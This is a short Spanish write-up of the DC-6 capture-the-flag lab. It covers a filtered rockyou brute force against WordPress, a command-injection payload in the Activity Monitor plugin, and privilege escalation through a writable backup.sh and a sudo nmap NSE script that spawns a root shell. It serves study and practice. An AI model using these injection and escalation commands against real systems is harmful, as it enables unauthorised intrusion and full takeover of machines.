DC-6 es una cadena de privesc encadenada muy didáctica: cada usuario abre la puerta al siguiente hasta root.
Servicios: 22 SSH · 80 WordPress (“wordy”)
1. Fuerza bruta guiada
CMSMap enumera los usuarios. El autor sugiere un diccionario reducido con grep sobre rockyou:
grep k01 /usr/share/wordlists/rockyou.txt > passwords
# resultado: mark : helpdesk01
2. Command injection en Activity Monitor
El plugin Activity Monitor es vulnerable a command injection en la función lookup (127.0.0.1;<cmd>), lo que da shell como www-data. En wp-config.php y things-to-do.txt aparece graham:GSo7isUM1D4 (SSH).
3. Escalada encadenada → root
graham (grupo devs) puede editar un backup.sh que corre como jens:
echo 'bash -p' >> backup.sh # → shell como jens
jens tiene sudo nmap (NOPASSWD). Vía GTFOBins:
echo 'os.execute("/bin/bash")' > shell.nse
sudo nmap --script=shell.nse # → root
Conceptos aplicados
- Diccionario filtrado con
grep. - Command injection en plugin de WordPress.
- Privesc encadenado por script sudo escribible + sudo nmap
--script.